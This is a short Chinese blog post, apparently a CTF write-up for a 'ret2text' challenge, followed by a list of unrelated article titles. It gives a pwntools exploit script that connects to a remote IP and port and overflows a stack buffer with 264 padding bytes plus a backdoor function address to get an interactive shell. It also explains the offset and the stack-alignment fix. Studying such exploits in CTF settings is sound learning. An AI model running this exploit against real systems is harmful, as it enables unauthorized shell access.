当前位置: 首页 > news >正文

ret2text

news 2026/3/27 8:52:21

from pwn import *

io = remote("39.106.48.123", 29826)

payload = b"A"*264 + p64(0x401202)

io.sendline(payload)

io.interactive()

264即258+8,258是rbp的位置,ida里一般是16位,0x401202为后门函数入栈的地址

注意:1.一定不要忘记加8个字节 2.如果不成功,可能是栈没有对齐,需要把后门函数的地址往后加两个单位

http://www.jsqmd.com/news/21676/

相关文章:

  • ABP - 异常处理(Exception Handling)[AbpExceptionFilter、UserFriendlyException、IExceptionSubscriber]
  • 2025年沸腾干燥机厂家权威推荐榜单:专业直销与高效节能技术深度解析,提供优质沸腾干燥设备及定制方案
  • CF Round 1046(#2135) 总结
  • 重组蛋白表达的几种类型介绍
  • Luogu P5479 [BJOI2015] 隐身术 题解 [ 紫 ] [ 多维 DP ] [ 交换维度 ] [ 后缀数组 ] [ 哈希 ]
  • 2025年10月23日
  • 大象《Thinking in Projects》读书笔记2
  • 06_DNS解析:从域名到IP地址
  • ABP - 接口授权 [Authorize、AllowAnonymous、IPermissionChecker]
  • 日总结 17
  • 杂题选做-3
  • 10.24每日总结
  • 利用Eval Villain挖掘CSPT漏洞的完整指南
  • Button按钮插入图片后仍有白色边框的解决办法
  • Unity静态资源优化
  • 【Java】Spring @Transactional 事务失效:9大经典『陷阱』及终极解决方案
  • 【模板】动态 dp 学习笔记(树剖版)
  • ABP - JWT 鉴权(JWT Authentication)[AbpJwtBearerModule、JwtBearerOptions]
  • 软考四
  • CSP-S2022
  • Hugo主题定制速查手册
  • 10/24
  • Hugo主题的修改和配置
  • 多元生成函数+多项式方程组——[AGC058D] Yet Another ABC String
  • 最小生成树 kruskal算法
  • Tarjan练习
  • Python开发之设置Hugging Face的模型缓存目录(HF_HOME )及模型下载超时问题(HF_ENDPOINT)
  • Java中的字符串及相关类的介绍
  • 洛谷 P9530 Fish 2
  • 10.24上课笔记